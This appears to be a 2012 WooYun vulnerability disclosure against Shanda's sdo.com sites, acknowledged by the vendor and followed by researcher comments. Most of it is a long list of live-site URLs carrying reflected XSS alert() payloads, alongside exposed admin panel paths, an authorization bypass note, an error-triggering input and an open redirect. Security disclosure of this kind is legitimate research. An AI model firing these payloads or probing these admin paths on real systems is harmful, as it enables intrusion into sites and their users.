http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx='"><script>alert(6112296);</script><"&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid='"><script>alert(1535785);</script><"&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType='"><script>alert(6920369);</script><"&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://jf.sdo.com/Partner/PromotionList.aspx?type='"><script>alert(3820307);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11690?queryString='"><script>alert(6392999);</script><"&idx=11690
http://lt.abc.sdo.com/knowledge/ClassShow/11689?queryString='"><script>alert(8150974);</script><"&idx=11689
http://lt.abc.sdo.com/knowledge/ClassShow/11690?queryString=1&idx='"><script>alert(7444296);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11688?queryString='"><script>alert(7444296);</script><"&idx=11688
http://lt.abc.sdo.com/knowledge/ClassShow/11687?queryString='"><script>alert(6400969);</script><"&idx=11687
http://lt.abc.sdo.com/knowledge/ClassShow/11695?queryString='"><script>alert(2856795);</script><"&idx=11695
http://lt.abc.sdo.com/knowledge/ClassShow/11689?queryString=1&idx='"><script>alert(6953485);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11688?queryString=1&idx='"><script>alert(1265984);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11695?queryString=1&idx='"><script>alert(1265984);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11687?queryString=1&idx='"><script>alert(8689273);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11693?queryString='"><script>alert(8689273);</script><"&idx=11693
http://lt.abc.sdo.com/knowledge/ClassShow/11693?queryString=1&idx='"><script>alert(7152569);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/12569?queryString='"><script>alert(0805996);</script><"&idx=12569
http://ga.abc.sdo.com/knowledge/ClassShow/12569?queryString=1&idx=';</script><script>alert(0805996);</script>
http://ga.abc.sdo.com/knowledge/ClassShow/11578?queryString='"><script>alert(2240958);</script><"&idx=11578
http://ga.abc.sdo.com/knowledge/ClassShow/11583?queryString='"><script>alert(5647584);</script><"&idx=11583
http://ga.abc.sdo.com/knowledge/ClassShow/11584?queryString=1&idx='"><script>alert(9843284);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/11578?queryString=1&idx='"><script>alert(1950983);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/11583?queryString=1&idx='"><script>alert(3686881);</script><"
http://register.sdo.com/gaea/input_pt.aspx?from=121&zone='"><script>alert(6215670);</script><"
http://register.sdo.com/gaea/phone_overseas.aspx?from='"><script>alert(2192155);</script><"&zone=nav
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone='"><script>alert(0314432);</script><"
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType='"><script>alert(9646418);</script><"®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid='"><script>alert(8079841);</script><"&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid='"><script>alert(1210537);</script><"&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001='"><script>alert(2465525);</script><"&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002='"><script>alert(9923001);</script><"&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001='"><script>alert(5280583);</script><"&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002='"><script>alert(3117847);</script><"&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck='"><script>alert(2649984);</script><"&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom='"><script>alert(9053711);</script><"&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone='"><script>alert(7347684);</script><"&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid='"><script>alert(4972556);</script><"&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype='"><script>alert(5027418);</script><"&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner='"><script>alert(2585428);</script><"&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype='"><script>alert(4100227);</script><"&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent='"><script>alert(1049614);</script><"&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype='"><script>alert(3785412);</script><"&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo='"><script>alert(2769998);</script><"&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount='"><script>alert(9116294);</script><"&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection='"><script>alert(6583770);</script><"
http://cy.sdo.com/bbs/index.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287151867%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/register.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282564266%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/memcp.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%285235041%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/medal.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%283273439%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/stats.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/member.php?action=lostpasswd&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/2fly_gift.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282847615%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/forumdisplay.php?fid=24&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282950003%29%3B%3C/script%3E&cookietime=2592000
http://ws.abc.sdo.com/knowledge/ClassShow/13045?queryString='"><script>alert(0513467);</script><"&idx=13045
http://ws.abc.sdo.com/knowledge/ClassShow/13046?queryString='"><script>alert(3721571);</script><"&idx=13046
http://ws.abc.sdo.com/knowledge/ClassShow/13047?queryString='"><script>alert(0426668);</script><"&idx=13047
http://ws.abc.sdo.com/knowledge/ClassShow/13048?queryString='"><script>alert(2149265);</script><"&idx=13048
http://ws.abc.sdo.com/knowledge/ClassShow/13045?queryString=1&idx='"><script>alert(2149265);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13049?queryString='"><script>alert(5355054);</script><"&idx=13049
http://ws.abc.sdo.com/knowledge/ClassShow/13047?queryString=1&idx='"><script>alert(8551854);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13046?queryString=1&idx='"><script>alert(4964253);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13048?queryString=1&idx='"><script>alert(4964253);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13049?queryString=1&idx='"><script>alert(7809430);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13063?queryString='"><script>alert(0876530);</script><"&idx=13063
http://ws.abc.sdo.com/knowledge/ClassShow/13064?queryString='"><script>alert(3393352);</script><"&idx=13064
http://ws.abc.sdo.com/knowledge/ClassShow/13068?queryString='"><script>alert(9668415);</script><"&idx=13068
http://ws.abc.sdo.com/knowledge/ClassShow/13070?queryString='"><script>alert(1802440);</script><"&idx=13070
http://ws.abc.sdo.com/knowledge/ClassShow/13063?queryString=1&idx='"><script>alert(1802440);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13064?queryString=1&idx='"><script>alert(5912402);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13072?queryString='"><script>alert(5912402);</script><"&idx=13072
http://ws.abc.sdo.com/knowledge/ClassShow/13067?queryString='"><script>alert(7535048);</script><"&idx=13067
http://ws.abc.sdo.com/knowledge/ClassShow/13071?queryString='"><script>alert(2957539);</script><"&idx=13071
http://ws.abc.sdo.com/knowledge/ClassShow/13068?queryString=1&idx='"><script>alert(6642383);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13072?queryString=1&idx='"><script>alert(1376727);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13089?queryString='"><script>alert(4583426);</script><"&idx=13089
http://ws.abc.sdo.com/knowledge/ClassShow/13067?queryString=1&idx='"><script>alert(4583426);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13093?queryString='"><script>alert(4583426);</script><"&idx=13093
http://ws.abc.sdo.com/knowledge/ClassShow/13091?queryString='"><script>alert(4583426);</script><"&idx=13091
http://ws.abc.sdo.com/knowledge/ClassShow/13071?queryString=1&idx='"><script>alert(4583426);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13092?queryString='"><script>alert(0869258);</script><"&idx=13092
http://ws.abc.sdo.com/knowledge/ClassShow/13088?queryString='"><script>alert(3252579);</script><"&idx=13088
http://ws.abc.sdo.com/knowledge/ClassShow/13094?queryString='"><script>alert(3252579);</script><"&idx=13094
http://ws.abc.sdo.com/knowledge/ClassShow/13090?queryString='"><script>alert(3252579);</script><"&idx=13090
http://ws.abc.sdo.com/knowledge/ClassShow/13089?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13091?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13093?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13095?queryString='"><script>alert(2412714);</script><"&idx=13095
http://ws.abc.sdo.com/knowledge/ClassShow/13092?queryString=1&idx='"><script>alert(2412714);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13088?queryString=1&idx='"><script>alert(5618414);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13090?queryString=1&idx='"><script>alert(5618414);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13094?queryString=1&idx='"><script>alert(9834013);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13085?queryString='"><script>alert(1940913);</script><"&idx=13085
http://ws.abc.sdo.com/knowledge/ClassShow/13087?queryString='"><script>alert(4148512);</script><"&idx=13087
http://ws.abc.sdo.com/knowledge/ClassShow/13070?queryString=1&idx='"><script>alert(4148512);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13095?queryString=1&idx='"><script>alert(7253211);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13082?queryString='"><script>alert(7253211);</script><"&idx=13082
http://ws.abc.sdo.com/knowledge/ClassShow/13080?queryString='"><script>alert(7253211);</script><"&idx=13080
http://ws.abc.sdo.com/knowledge/ClassShow/13078?queryString='"><script>alert(3677700);</script><"&idx=13078
http://ws.abc.sdo.com/knowledge/ClassShow/13083?queryString='"><script>alert(3677700);</script><"&idx=13083
http://ws.abc.sdo.com/knowledge/ClassShow/13079?queryString='"><script>alert(6772400);</script><"&idx=13079
http://ws.abc.sdo.com/knowledge/ClassShow/13085?queryString=1&idx='"><script>alert(6772400);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13087?queryString=1&idx='"><script>alert(6772400);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13075?queryString='"><script>alert(9989100);</script><"&idx=13075
http://ws.abc.sdo.com/knowledge/ClassShow/13076?queryString='"><script>alert(9989100);</script><"&idx=13076
http://ws.abc.sdo.com/knowledge/ClassShow/13082?queryString=1&idx='"><script>alert(2086900);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13080?queryString=1&idx='"><script>alert(2086900);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13078?queryString=1&idx='"><script>alert(8398393);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12545?queryString='"><script>alert(8398393);</script><"&idx=12545
http://ws.abc.sdo.com/knowledge/ClassShow/13076?queryString=1&idx='"><script>alert(0505096);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13075?queryString=1&idx='"><script>alert(0505096);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12548?queryString='"><script>alert(4711708);</script><"&idx=12548
http://ws.abc.sdo.com/knowledge/ClassShow/13077?queryString='"><script>alert(5192521);</script><"&idx=13077
http://ws.abc.sdo.com/knowledge/ClassShow/12554?queryString='"><script>alert(7818584);</script><"&idx=12554
http://ws.abc.sdo.com/knowledge/ClassShow/12545?queryString=1&idx='"><script>alert(2417275);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12549?queryString='"><script>alert(2417275);</script><"&idx=12549
http://ws.abc.sdo.com/knowledge/ClassShow/13079?queryString=1&idx='"><script>alert(6237560);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13083?queryString=1&idx='"><script>alert(9544396);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12555?queryString='"><script>alert(1659680);</script><"&idx=12555
http://ws.abc.sdo.com/knowledge/ClassShow/13077?queryString=1&idx='"><script>alert(1659680);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12554?queryString=1&idx='"><script>alert(8625956);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12548?queryString=1&idx='"><script>alert(8625956);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13074?queryString='"><script>alert(8625956);</script><"&idx=13074
http://ws.abc.sdo.com/knowledge/ClassShow/12556?queryString='"><script>alert(0069195);</script><"&idx=12556
http://ws.abc.sdo.com/knowledge/ClassShow/13052?queryString='"><script>alert(7391693);</script><"&idx=13052
http://ws.abc.sdo.com/knowledge/ClassShow/13058?queryString='"><script>alert(6993830);</script><"&idx=13058
http://ws.abc.sdo.com/knowledge/ClassShow/13074?queryString=1&idx='"><script>alert(2748299);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13056?queryString='"><script>alert(5808828);</script><"&idx=13056
http://ws.abc.sdo.com/knowledge/ClassShow/13055?queryString='"><script>alert(5808828);</script><"&idx=13055
http://ws.abc.sdo.com/knowledge/ClassShow/13052?queryString=1&idx='"><script>alert(9008591);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13057?queryString='"><script>alert(9008591);</script><"&idx=13057
http://ws.abc.sdo.com/knowledge/ClassShow/13060?queryString='"><script>alert(9008591);</script><"&idx=13060
http://ws.abc.sdo.com/knowledge/ClassShow/13061?queryString='"><script>alert(1104182);</script><"&idx=13061
http://ws.abc.sdo.com/knowledge/ClassShow/13058?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13062?queryString='"><script>alert(4328142);</script><"&idx=13062
http://ws.abc.sdo.com/knowledge/ClassShow/12556?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12555?queryString=1&idx='"><script>alert(8527681);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13056?queryString=1&idx='"><script>alert(0633370);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]='"><script>alert(0633370);</script><"&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13055?queryString=1&idx='"><script>alert(0633370);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13061?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13057?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13060?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12549?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13059?queryString='"><script>alert(6468769);</script><"&idx=13059
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]='"><script>alert(5475785);</script><"&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13062?queryString=1&idx='"><script>alert(1788377);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle='"><script>alert(1756743);</script><"&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13059?queryString=1&idx='"><script>alert(8671678);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID='"><script>alert(1922464);</script><"&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://2c.abc.sdo.com/knowledge/ClassShow/11997?queryString='"><script>alert(0341653);</script><"&idx=11997
http://2c.abc.sdo.com/knowledge/ClassShow/11997?queryString=1&idx='"><script>alert(7655439);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType='"><script>alert(7655439);</script><"&hidReference=&originalReferenceMedia=
http://2c.abc.sdo.com/knowledge/ClassShow/12000?queryString='"><script>alert(9616427);</script><"&idx=12000
http://2c.abc.sdo.com/knowledge/ClassShow/12000?queryString=1&idx='"><script>alert(8834649);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=';</script><script>alert(3012439);</script>&originalReferenceMedia=
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=';</script><script>alert(7373225);</script>
http://gui.sdo.com/admin/
http://kk.sdo.com/admin/
http://cy.sdo.com/200909/admin/ 这个我知道你们下线了,但是迟迟不把他下线,所以还是发出来!
还有上传页面比较多,我就不一一去看了。
http://in.sdo.com/wp-login.php  盛大创新学院
http://image.help.sdo.com/index.php 图片管理系统
http://icamp.sdo.com/manage/  权限绕过。嘎嘎
报错
http://bb.sdo.com/search.aspx?categoryid=%27%22%27%22%29%3b%7c%5d*%7b%250d%250a%3C%2500%3E&categoryname=%E8%89%BA%E6%9C%AF&page=4&searchtype=ebook
url跳转
http://sndasdopassport.sdo.com/sdodownload/passport/SNDAHomepage/SNDANavigator.aspx?From=1000Y.SDO.COM&Panel=HOME_NEWSBAR&To=http://www.wooyun.org

修复方案:

过滤,加强管理体系。
增强密码强度,限制后台权限。
盛大童鞋很给力,我就不说了。
QQ2036234 你们懂的。

版权声明:转载请注明来源 zeracker@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-05-25 14:41

厂商回复:

感谢反馈,这次zeracker很给力,我们内部已经在处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-05-25 05:48 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    这一夜。。。

  2. 2012-05-25 05:49 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @z@cx 这一夜发生了神马。

  3. 2012-05-25 05:53 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    @zeracker 想象你们在暴走拍键盘。。。

  4. 2012-05-25 05:56 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @z@cx 我是很温柔的,没那么激动。

  5. 2012-05-25 05:59 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    对了。那个app如果被绑马的话,危害是很大的。安全级别我就不用解释了。xss太乱了,我就不整理了,望见谅哈。

  6. 2012-05-25 05:59 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    @zeracker 嘿嘿。。。

  7. 2012-05-25 08:08 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    @zeracker 看大牛简介还在找工作中哦。。。盛大赶紧了。。。

  8. 2012-05-25 09:22 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    @zeracker 亲,这个状态面试神马的,完全没压力,哈哈。。。

  9. 2012-05-25 09:36 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    来鼓励一下企业招聘安全人员!

  10. 2012-05-25 09:46 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    还有一处爆敏感信息和网站路径的没发。

  11. 2012-05-25 09:50 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    还有列目录,太多了。

  12. 2012-05-25 09:58 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    @zeracker 亲 给盛大投个简历吧。

  13. 2012-05-25 11:43 | 松子 ( 实习白帽子 | Rank:45 漏洞数:5 | 无事)

    收了 收了

  14. 2012-05-25 12:05 | itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )

    激情四射的一夜

  15. 2012-05-25 12:22 | CodePlay ( 路人 | Rank:0 漏洞数:1 | Bypass The Token)

    可乐都醉了 佩服

  16. 2012-05-25 12:30 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @CodePlay 当初来广州前,以为没啥问题。你多喝点,就知道了。比喝啤酒痛苦多了,至少要喝2L 以上。

  17. 2012-06-26 10:45 | Sunshine ( 实习白帽子 | Rank:51 漏洞数:10 | Nothing.)

    @zeracker 你是一个人,还是一群人?

  18. 2012-07-09 07:46 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    @zeracker 表示我和可乐能一个人和一大瓶,真没试过醉过,我每次喝可乐喝一口,感觉全身使不完的力。。

